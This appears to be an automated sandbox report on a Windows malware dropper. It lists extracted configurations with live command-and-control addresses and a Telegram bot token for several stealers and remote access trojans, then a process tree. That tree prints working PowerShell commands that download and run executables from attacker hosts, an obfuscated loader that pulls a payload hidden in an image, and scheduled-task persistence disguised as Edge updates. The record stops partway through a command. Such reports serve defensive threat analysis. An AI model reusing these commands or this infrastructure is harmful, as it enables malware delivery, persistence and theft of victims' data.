Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-01-2025 16:01

General

  • Target

    f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe

  • Size

    1.8MB

  • MD5

    79313fd19b4d3a947a4a5bb6d8a3e719

  • SHA1

    f89d8fd59723ca8e433fd10a69c12f1da208d69d

  • SHA256

    f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40

  • SHA512

    35cdfe95ca8c7a8e51a636dcd1fdad96d319b933171d75df30dd52ff3f1b8720d6e1bacf6ca4352a7310b1711d111fe2da322e7a3a85f33fcaa42e8c79a62142

  • SSDEEP

    49152:IonQDVTFz3+dBKJCLKwVP9fcaGrGZ2nePhUC/SdcY6NSesH:/Q9tjJCGwVF0aGCZ2enty

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

91.212.166.99:4404

Mutex

f35pmRFzPiiasEf1

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    dllhost.exe

aes.plain

Extracted

Family

vidar

C2

https://t.me/sc1phell

https://steamcommunity.com/profiles/76561199819539662

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

159.100.19.137:7707

Mutex

yBu0GW2G5zAc

Attributes
  • delay

    3

  • install

    false

  • install_file

    svchost.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

Extracted

Family

stealc

Botnet

brat

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://toppyneedus.biz/api

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7796466207:AAFr4eJop5lV1qGyhuFlMc4hIV2ErcSZ_4E/sendMessag

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Detect Vidar Stealer 3 IoCs
  • Detect Xworm Payload 1 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • NetSupport

    NetSupport is a remote access tool sold as legitimate system administration software.

  • Netsupport family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Uses the powershell.exe command.

  • Downloads MZ/PE file 19 IoCs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 33 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 12 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe
    "C:\Users\Admin\AppData\Local\Temp\f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3004
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:980
      • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
        "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4264
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3788
      • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
        "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2776
      • C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe
        "C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1160
      • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe
        "C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3732
        • C:\Users\Admin\AppData\Local\Temp\is-MT01V.tmp\IJWSn6z.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-MT01V.tmp\IJWSn6z.tmp" /SL5="$A0230,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4976
          • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe
            "C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2732
            • C:\Users\Admin\AppData\Local\Temp\is-EF9JU.tmp\IJWSn6z.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-EF9JU.tmp\IJWSn6z.tmp" /SL5="$E0050,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:672
              • C:\Windows\SysWOW64\regsvr32.exe
                "regsvr32.exe" /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:844
                • C:\Windows\system32\regsvr32.exe
                  /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"
                  8⤵
                  • Loads dropped DLL
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:948
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3512
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{FA7BC360-7A5D-4EC8-F7C4-050988450400}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1480
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dllhost" /tr "C:\Users\Admin\AppData\Local\dllhost.exe"
                    9⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4552
      • C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe
        "C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2276
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4016
      • C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe
        "C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4236
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1504
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            PID:4216
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "opssvc wrsa"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4728
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            PID:316
          • C:\Windows\SysWOW64\findstr.exe
            findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            5⤵
            PID:1916
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c md 764661
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3748
          • C:\Windows\SysWOW64\extrac32.exe
            extrac32 /Y /E Fm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4332
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V "Tunnel" Addresses
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4564
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2592
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1820
          • C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com
            Macromedia.com F
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2560
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1192
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3512
          • C:\Windows\SysWOW64\choice.exe
            choice /d y /t 15
            5⤵
            • System Location Discovery: System Language Discovery
            PID:316
      • C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe
        "C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:3744
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c 67938ad15f2a9.vbs
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:4796
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67938ad15f2a9.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3988
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1256
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                PID:3540
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1480
      • C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe
        "C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4444
        • C:\Users\Admin\AppData\Local\Temp\is-U7AVN.tmp\LCESjzR.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-U7AVN.tmp\LCESjzR.tmp" /SL5="$E01C6,14491362,830464,C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          PID:3272
          • C:\Users\Admin\AppData\Local\Temp\is-93EA8.tmp\driver3.exe
            "C:\Users\Admin\AppData\Local\Temp\is-93EA8.tmp\driver3.exe"
            5⤵
            • Drops startup file
            • Executes dropped EXE
            PID:5044
            • C:\Users\Admin\AppData\Roaming\update\client32.exe
              "C:\Users\Admin\AppData\Roaming\update\client32.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              PID:1920
      • C:\Users\Admin\AppData\Local\Temp\1052869101\a19ddbcf22.exe
        "C:\Users\Admin\AppData\Local\Temp\1052869101\a19ddbcf22.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn 9kU9rmaI6MC /tr "mshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4036
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn 9kU9rmaI6MC /tr "mshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:852
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          PID:2540
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            PID:3740
            • C:\Users\Admin\AppData\Local\TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE
              "C:\Users\Admin\AppData\Local\TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:4028
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2276
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3624
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:4884
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4400
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              PID:2624
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:824
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              PID:2440
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3924
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              PID:1940
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "mCP7pma47aS" /tr "mshta \"C:\Temp\Qnd7Nib1E.hta\"" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2056
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\Qnd7Nib1E.hta"
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:3748
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:3532
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  PID:4644
        • C:\Users\Admin\AppData\Local\Temp\1052883001\1400d853a7.exe
          "C:\Users\Admin\AppData\Local\Temp\1052883001\1400d853a7.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          PID:3732
        • C:\Users\Admin\AppData\Local\Temp\1052895001\2cbf0a74ae.exe
          "C:\Users\Admin\AppData\Local\Temp\1052895001\2cbf0a74ae.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:4140
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c 67938ad15f2a9.vbs
            4⤵
            • Checks computer location settings
            • Modifies registry class
            PID:4796
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\67938ad15f2a9.vbs"
              5⤵
              • Checks computer location settings
              PID:964
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 